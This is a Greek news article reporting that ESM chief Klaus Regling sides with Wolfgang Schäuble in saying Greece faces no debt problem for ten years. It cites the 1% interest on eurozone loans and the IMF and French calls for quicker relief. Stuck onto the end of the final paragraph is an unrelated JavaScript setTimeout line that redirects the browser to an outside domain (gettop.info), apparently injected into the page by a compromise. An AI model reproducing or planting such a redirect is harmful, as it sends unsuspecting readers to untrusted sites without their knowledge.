Ρέγκλινγκ στο πλευρό Σόιμπλε: Η Ελλάδα δεν έχει πρόβλημα χρέους για 10 χρόνια

0
5

 

Συνεχίζεται το γαϊτανάκι των δηλώσεων υψηλόβαθμων αξιωματούχων γύρω από την πορεία του ελληνικού χρέους, με τον επικεφαλής του Ευρωπαϊκού Μηχανισμού Σταθερότητας (ESM), Κλάους Ρέγκλινγκ, να δηλώνει πως δεν θεωρεί πως η Ελλάδα έχει ουσιαστικό πρόβλημα χρέους. Μάλιστα συντάσσεται στη σκληρή γραμμή του Βόλφγκανγκ Σόιμπλε για μετάθεση της συζήτησης για το χρέος διαμηνύοντας πως η Ελλάδα δεν θα έχει κανένα πρόβλημα εξαιτίας του χρέους για τουλάχιστον μία ακόμα δεκαετία.

«Βραχυπρόθεσμα δεν υπάρχει κανένα πρόβλημα», δήλωσε ο κ. Ρέγκλινγκ, όπως μεταδίδει η «Wall Street Journal». «Είμαι μάλλον στο πλευρό του Σόιμπλε, παρά της [διευθύντριας του ΔΝΤ] Λαγκάρντ», η οποία έχει ζητήσει να επιλυθεί το ζήτημα το ταχύτερο δυνατό.

Παρά το γεγονός ότι πέρυσι το ελληνικό χρέος άγγιξε το 180% του ΑΕΠ, ο επικεφαλής του ESM επισήμανε πως αυτό δεν έχει ιδιαίτερα μεγάλη σημασία όταν οι τόκοι που πληρώνονται κάθε χρόνο «είναι 1%», χάρη στα χαμηλότοκα δάνεια στήριξης που έχουν προσφέρει οι ευρωπαίοι εταίροι. Η Αθήνα σήμερα πληρώνει λιγότερα για το χρέος της, σε σχέση με τη Γαλλία και το Βέλγιο δήλωσε ο κ. Ρέγκλιγκ.

«Αυτό είναι τεράστιο πλεονέκτημα», συνέχισε ο κ. Ρέγκλινγκ. «Αυτή είναι η αλληλεγγύη της ευρωζώνης προς την Ελλάδα, είναι ήδη εκεί, επαναλαμβάνεται κάθε χρόνο».

Η τοποθέτηση Ρέγκλινγκ συνιστά πλήγμα για την ελληνική πλευρά, η οποία επιδιώκει την ελάφρυνση του χρέους το ταχύτερο δυνατό, αλλά και διότι η διευθέτηση του ζητήματος θα αυξήσει σημαντικά την πιθανότητα ένταξης των ελληνικών ομολόγων στην ποσοτική χαλάρωση της Ευρωπαϊκής Κεντρικής Τράπεζας.
Aπό την πλευρά του το ΔΝΤ έχει ζητήσει από τους Ευρωπαίους να συγκεκριμενοποιήσουν τις μακροπρόθεσμες παρεμβάσεις που προτίθενται να κάνουν για το χρέος το ταχύτερο δυνατό.

Η Γαλλία έχει ταχθεί υπέρ του να ανοίξει άμεσα η διαβούλευση για ελάφρυνση του χρέους, όμως ο Γερμανός υπουργός Οικονομικών Βόλφγκανγκ Σόιμπλε έχει καταστήσει σαφές πως το θέμα είναι στην ουσία «παγωμένο» έως το 2018, μετά τη λήξη του μνημονίου, αλλά και μετά τις γερμανικές εκλογές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here